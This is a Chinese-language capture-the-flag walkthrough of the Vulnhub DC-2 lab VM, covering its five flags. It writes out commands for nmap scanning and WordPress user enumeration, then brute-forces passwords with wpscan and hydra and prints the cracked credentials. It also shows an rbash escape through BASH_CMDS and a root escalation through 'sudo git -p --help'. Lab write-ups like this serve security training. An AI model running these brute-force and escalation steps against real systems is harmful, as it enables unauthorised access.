Vulnhub靶机实战——DC-2

靶机DC-2下载地址:https : //download.vulnhub.com/dc/DC-2.zip

描述:靶机DC-2与DC-1一样,共有5个flag,但最终需要root权限才可以找到并查看flag

 

环境:Vmware 15 Pro虚拟机软件

          DC-1靶机IP地址:192.168.220.132

          Kali的IP地址:192.168.220.131

 

DC-2靶机渗透测试,将靶机DC-2与kali都以NAT模式连接网络,Kali查看本地IP地址:192.168.220.132

ip addr

Vulnhub靶机实战——DC-2_第1张图片

使用nmap扫描工具,扫描本地192.168.220.0/24网段发现存活主机,发现靶机IP:192.168.220.132

nmap -T4 -sP 192.168.220.0/24 -oN nmap220.sP

Vulnhub靶机实战——DC-2_第2张图片

nmap扫描靶机DC-2所有端口,发现80(http)、7744(ssh)端口开放

nmap -T4 -A 192.168.220.132 -p 1-65535 -oN nmap132.A

Vulnhub靶机实战——DC-2_第3张图片

浏览器访问http://192.168.220.132,发现无法正常访问页面,但在url地址栏会有http://dc-2域名提示,发现问题是本地无法解析域名dc-2

Vulnhub靶机实战——DC-2_第4张图片

编辑/etc/hosts文件,添加靶机IP地址及对应域名:192.168.220.132  dc-2

vim /etc/hosts
192.168.220.132  dc-2

Vulnhub靶机实战——DC-2_第5张图片

添加域名解析后,可以正常访问网页信息,并能在Flag页面找到flag1

提示使用cewl密码字典生成工具,并且在登录后可以找到下一个flag

Vulnhub靶机实战——DC-2_第6张图片

flag1提示可以登录,但正常访问网页无法找到登录页面,所以使用nikto工具扫描网站结构,找到wp-login.php登录页面

nikto -h dc-2 -o nikto-dc2.txt
cat dc-2.nikto

Vulnhub靶机实战——DC-2_第7张图片

访问登录页面:http://dc-2/wp-login.php

Vulnhub靶机实战——DC-2_第8张图片

一般WordPress网站都会有admin用户,但需要爆破密码

使用wpscan工具扫描网站,获取可以登录网站的用户名,扫描后可以找到三个用户名:admin、tom、jerry

wpscan --url dc-2 -e u

Vulnhub靶机实战——DC-2_第9张图片

将扫描到的三个用户名添加到dc-2users.list

vim dc-2users.list
admin
tom
jerry

使用flag1中提示的工具cewl生成密码字典dc-2pass.dic

cewl dc-2 -w dc-2.dic
cat dc-2pass.dic

Vulnhub靶机实战——DC-2_第10张图片

使用wpscan工具爆破可以登录用户的密码,可成功爆破tom和jerry用户

wpscan --url dc-2 -U dc-2users.list -P dc-2pass.dic
jerry / adipiscing
tom / parturient  

Vulnhub靶机实战——DC-2_第11张图片

使用tom用户登录论坛,没找到有用信息

Vulnhub靶机实战——DC-2_第12张图片

再使用jerry用户登录论坛,可以找到flag2,再无其他有用信息

Flag2:

If you can't exploit WordPress and take a shortcut, there is another way.

Hope you found another entry point.

如果你不能利用WordPress并抄近路,还有别的办法。

希望你能找到另一个切入点。

Vulnhub靶机实战——DC-2_第13张图片

Flag2提示从另外一个方向切入,所以80端口切入失败,这时用到另外一个7744(ssh)端口

使用hydra工具使用已生成的密码字典对已知的用户名进行ssh登录密码爆破,获得ssh登录用户:tom / parturient

hydra -L dc-2users.list  -P dc-2pass.dic  192.168.220.132 ssh -s 7744
login: tom   password: parturient

Vulnhub靶机实战——DC-2_第14张图片

使用tom用户ssh登录

ssh [email protected] -p 7744

Vulnhub靶机实战——DC-2_第15张图片

使用tom用户ssh登录后,使用 ls 命令在家目录中找到flag3.txt,有一个 su 提示应该切换用户

Flag3:

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

可怜的老汤姆老是追杰瑞。也许他应该为他造成的所有压力负责。

 

但发现tom只能使用less、ls、scp、vi命令,无法直接使用su命令切换用户

BASH_CMDS[a]=/bin/sh ; a  #调用/bin/sh命令解释器
/bin/bash   #使用bash命令解释器
export PATH=PATH:/bin:/sbin:/usr/bin:/usr/sbin  #设置环境变量

此时命令基本上都可以使用,也可以table补全命令

Vulnhub靶机实战——DC-2_第16张图片

切换到jerry用户,进入jerry家目录下

su jerry  
adipiscing   #jerry用户登录密码

ls 找到flag4.txt,提示使用git 命令

Vulnhub靶机实战——DC-2_第17张图片

Flag4:

Good to see that you've made it this far - but you're not home yet.

You still need to get the final flag (the only flag that really counts!!!). 

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

sudo -l    #查看可以使用root权限无密码的命令,有git命令
sudo git -p –-help  #提权

Vulnhub靶机实战——DC-2_第18张图片

whoami   #查看当前用户

passwd  root   #修改root密码
123456    #密码修改为:123456

Vulnhub靶机实战——DC-2_第19张图片

su root   #切换到root用户
cd /root  #进入到root家目录下
ls    #找到final-flag.txt

Vulnhub靶机实战——DC-2_第20张图片

找到5个flag文件,并提权成功!

你可能感兴趣的:(靶机)